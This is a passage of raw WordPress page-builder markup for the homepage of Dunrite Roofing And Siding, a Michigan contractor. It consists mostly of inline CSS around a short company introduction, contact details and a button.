.skt-blocks-block-advanced-heading.block-842dd40e-fa77-4ec4-ad2a-03f89d294ee2 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-842dd40e-fa77-4ec4-ad2a-03f89d294ee2 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-842dd40e-fa77-4ec4-ad2a-03f89d294ee2 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-842dd40e-fa77-4ec4-ad2a-03f89d294ee2 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-842dd40e-fa77-4ec4-ad2a-03f89d294ee2 .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-842dd40e-fa77-4ec4-ad2a-03f89d294ee2 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-842dd40e-fa77-4ec4-ad2a-03f89d294ee2 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-842dd40e-fa77-4ec4-ad2a-03f89d294ee2 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-842dd40e-fa77-4ec4-ad2a-03f89d294ee2 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-842dd40e-fa77-4ec4-ad2a-03f89d294ee2 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-842dd40e-fa77-4ec4-ad2a-03f89d294ee2\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Our Introduction</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Welcome to Dunrite Roofing And Siding</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"style\":{\"typography\":{\"fontSize\":17},\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\"} -->\n<p class=\"section-content has-text-color\" style=\"color:#494848;font-size:17px\">Based in Northern Oakland County Dunrite Roofing has been serving the surrounding areas for over 25 years. Quality workmanship and competitive pricing&nbsp;have led us to become a top choice when it comes to roofing and siding in southeastern Michigan.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"38f79afe-0ff0-4261-81f7-51765fe2292e\",\"topPadding\":0,\"topPaddingTablet\":0,\"bottomPadding\":80,\"leftPadding\":0,\"leftPaddingTablet\":0,\"rightPadding\":0,\"rightPaddingTablet\":0,\"topMarginTablet\":-15,\"className\":\"gb-renovation-contact\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-contact skt-blocks-block-section-outer-wrap block-38f79afe-0ff0-4261-81f7-51765fe2292e background-type-none alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-38f79afe-0ff0-4261-81f7-51765fe2292e .skt-blocks-block-section{\n margin-top: -15px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 10px; padding-left: 0px; padding-right: 0px; }\n}\n @media only screen and (max-width: 767px){\n .block-38f79afe-0ff0-4261-81f7-51765fe2292e .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-38f79afe-0ff0-4261-81f7-51765fe2292e .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 80px; padding-left: 0px; padding-right: 0px; }\n}\n .block-38f79afe-0ff0-4261-81f7-51765fe2292e.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-38f79afe-0ff0-4261-81f7-51765fe2292e.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-38f79afe-0ff0-4261-81f7-51765fe2292e.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-38f79afe-0ff0-4261-81f7-51765fe2292e.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-38f79afe-0ff0-4261-81f7-51765fe2292e.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"blockId\":\"f06a751e-4089-4050-9774-0f291da3b406\"} -->\n<style type=\"text/css\"> .block-f06a751e-4089-4050-9774-0f291da3b406 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-f06a751e-4089-4050-9774-0f291da3b406 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-f06a751e-4089-4050-9774-0f291da3b406 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-f06a751e-4089-4050-9774-0f291da3b406 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-f06a751e-4089-4050-9774-0f291da3b406 .skt-blocks-block-columns{\n padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-f06a751e-4089-4050-9774-0f291da3b406 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-f06a751e-4089-4050-9774-0f291da3b406 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-f06a751e-4089-4050-9774-0f291da3b406 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":45,\"leftPadding\":0,\"leftPaddingTablet\":0,\"topPaddingMobile\":0,\"blockId\":\"08122694-7f53-432f-b5ed-d0be80443eb5\"} -->\n<style type=\"text/css\"> .block-08122694-7f53-432f-b5ed-d0be80443eb5 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-08122694-7f53-432f-b5ed-d0be80443eb5 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-08122694-7f53-432f-b5ed-d0be80443eb5 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-08122694-7f53-432f-b5ed-d0be80443eb5 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-08122694-7f53-432f-b5ed-d0be80443eb5 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-08122694-7f53-432f-b5ed-d0be80443eb5\" style=\"width:45%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":19,\"resheadFontWeight\":\"500\",\"ressubHeadFontSize\":19,\"ressubHeadFontWeight\":\"500\",\"resheadSpace\":5,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"iconImage\":{\"id\":18,\"title\":\"call-icon\",\"filename\":\"call-icon.png\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/call-icon.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/call-icon/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"call-icon\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:33.000Z\",\"modified\":\"2021-05-25T13:48:33.000Z\",\"menuOrder\":0,\"mime\":\"image/png\",\"type\":\"image\",\"subtype\":\"png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"5b5e5edc14\",\"delete\":\"ba6642c69e\",\"edit\":\"618a805067\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=18u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":593,\"filesizeHumanReadable\":\"593 B\",\"context\":\"\",\"height\":24,\"width\":23,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/call-icon.png\",\"height\":24,\"width\":23,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":23,\"resshowPrefix\":false,\"counterId\":\"b02dd8d4-86fb-4546-8342-3c550fd9ce0b\"} -->\n<style type=\"text/css\"> .skt-blocks-block-b02dd8d4-86fb-4546-8342-3c550fd9ce0b .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-b02dd8d4-86fb-4546-8342-3c550fd9ce0b .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-b02dd8d4-86fb-4546-8342-3c550fd9ce0b .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-b02dd8d4-86fb-4546-8342-3c550fd9ce0b .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-b02dd8d4-86fb-4546-8342-3c550fd9ce0b .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-b02dd8d4-86fb-4546-8342-3c550fd9ce0b .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-b02dd8d4-86fb-4546-8342-3c550fd9ce0b .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-b02dd8d4-86fb-4546-8342-3c550fd9ce0b.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 19px !important; }\n .skt-blocks-block-b02dd8d4-86fb-4546-8342-3c550fd9ce0b.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 19px !important; }\n .skt-blocks-block-b02dd8d4-86fb-4546-8342-3c550fd9ce0b .skt-blocks-ifb-image-content img {\n width: 23px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-b02dd8d4-86fb-4546-8342-3c550fd9ce0b.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-b02dd8d4-86fb-4546-8342-3c550fd9ce0b.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-b02dd8d4-86fb-4546-8342-3c550fd9ce0b .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-b02dd8d4-86fb-4546-8342-3c550fd9ce0b.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-b02dd8d4-86fb-4546-8342-3c550fd9ce0b.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-b02dd8d4-86fb-4546-8342-3c550fd9ce0b .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-b02dd8d4-86fb-4546-8342-3c550fd9ce0b.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-b02dd8d4-86fb-4546-8342-3c550fd9ce0b skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:5px;margin-top:5px;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/call-icon.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:500;font-family:Poppins;margin-bottom:5px\">Call Us</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:500;margin-bottom:10px\">(248) 393-5000&nbsp;</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":55,\"leftPadding\":0,\"leftPaddingTablet\":0,\"topPaddingMobile\":15,\"blockId\":\"3ad18a45-e196-4390-8eb8-51cdb07e553e\"} -->\n<style type=\"text/css\"> .block-3ad18a45-e196-4390-8eb8-51cdb07e553e .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-3ad18a45-e196-4390-8eb8-51cdb07e553e .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-3ad18a45-e196-4390-8eb8-51cdb07e553e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-3ad18a45-e196-4390-8eb8-51cdb07e553e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-3ad18a45-e196-4390-8eb8-51cdb07e553e .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-3ad18a45-e196-4390-8eb8-51cdb07e553e\" style=\"width:55%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":19,\"resheadFontWeight\":\"600\",\"ressubHeadFontSize\":19,\"ressubHeadFontWeight\":\"500\",\"resheadSpace\":5,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"iconImage\":{\"id\":19,\"title\":\"email-icon\",\"filename\":\"email-icon.png\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/email-icon.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/email-icon/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"email-icon\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:34.000Z\",\"modified\":\"2021-05-25T13:48:34.000Z\",\"menuOrder\":0,\"mime\":\"image/png\",\"type\":\"image\",\"subtype\":\"png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"322c42b944\",\"delete\":\"c562e168cc\",\"edit\":\"244b0c81a3\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=19u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":451,\"filesizeHumanReadable\":\"451 B\",\"context\":\"\",\"height\":16,\"width\":23,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/email-icon.png\",\"height\":16,\"width\":23,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":23,\"resshowPrefix\":false,\"counterId\":\"8d50adf9-5ba2-4049-8b59-5b0dbf3c0daf\"} -->\n<style type=\"text/css\"> .skt-blocks-block-8d50adf9-5ba2-4049-8b59-5b0dbf3c0daf .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-8d50adf9-5ba2-4049-8b59-5b0dbf3c0daf .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-8d50adf9-5ba2-4049-8b59-5b0dbf3c0daf .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-8d50adf9-5ba2-4049-8b59-5b0dbf3c0daf .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-8d50adf9-5ba2-4049-8b59-5b0dbf3c0daf .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-8d50adf9-5ba2-4049-8b59-5b0dbf3c0daf .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-8d50adf9-5ba2-4049-8b59-5b0dbf3c0daf .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-8d50adf9-5ba2-4049-8b59-5b0dbf3c0daf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 19px !important; }\n .skt-blocks-block-8d50adf9-5ba2-4049-8b59-5b0dbf3c0daf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 19px !important; }\n .skt-blocks-block-8d50adf9-5ba2-4049-8b59-5b0dbf3c0daf .skt-blocks-ifb-image-content img {\n width: 23px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-8d50adf9-5ba2-4049-8b59-5b0dbf3c0daf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-8d50adf9-5ba2-4049-8b59-5b0dbf3c0daf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-8d50adf9-5ba2-4049-8b59-5b0dbf3c0daf .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-8d50adf9-5ba2-4049-8b59-5b0dbf3c0daf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-8d50adf9-5ba2-4049-8b59-5b0dbf3c0daf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-8d50adf9-5ba2-4049-8b59-5b0dbf3c0daf .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-8d50adf9-5ba2-4049-8b59-5b0dbf3c0daf.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-8d50adf9-5ba2-4049-8b59-5b0dbf3c0daf skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:5px;margin-top:5px;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/email-icon.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:600;font-family:Poppins;margin-bottom:5px\">Email Us</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:500;margin-bottom:10px\">admin@dunriteroof.com</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"left\"} -->\n<div class=\"left tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"Read More\",\"link\":\"https://dunriteroof.com/contact us\",\"counterId\":\"246a2b65-87d8-4918-b298-987be4cda10b\",\"vPadding\":15,\"hPadding\":35,\"vMargin\":0,\"hMargin\":0,\"borderRadius\":50,\"borderStyle\":\"none\",\"borderColor\":\"#ffffff\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":16,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"600\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-246a2b65-87d8-4918-b298-987be4cda10b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 0px !important; margin-bottom: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-246a2b65-87d8-4918-b298-987be4cda10b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-246a2b65-87d8-4918-b298-987be4cda10b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-246a2b65-87d8-4918-b298-987be4cda10b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-246a2b65-87d8-4918-b298-987be4cda10b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-246a2b65-87d8-4918-b298-987be4cda10b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-246a2b65-87d8-4918-b298-987be4cda10b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 15px; padding-bottom: 15px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-246a2b65-87d8-4918-b298-987be4cda10b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-246a2b65-87d8-4918-b298-987be4cda10b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-246a2b65-87d8-4918-b298-987be4cda10b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 35px; padding-right: 35px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-246a2b65-87d8-4918-b298-987be4cda10b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-246a2b65-87d8-4918-b298-987be4cda10b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-246a2b65-87d8-4918-b298-987be4cda10b.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-246a2b65-87d8-4918-b298-987be4cda10b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-246a2b65-87d8-4918-b298-987be4cda10b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: #ffffff; border-radius: 50px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-246a2b65-87d8-4918-b298-987be4cda10b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 16px; font-family: Poppins; font-weight: 600; line-height: undefined; opacity: 1; }\n .skt-blocks-246a2b65-87d8-4918-b298-987be4cda10b .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-246a2b65-87d8-4918-b298-987be4cda10b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-246a2b65-87d8-4918-b298-987be4cda10b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-246a2b65-87d8-4918-b298-987be4cda10b .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-246a2b65-87d8-4918-b298-987be4cda10b .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 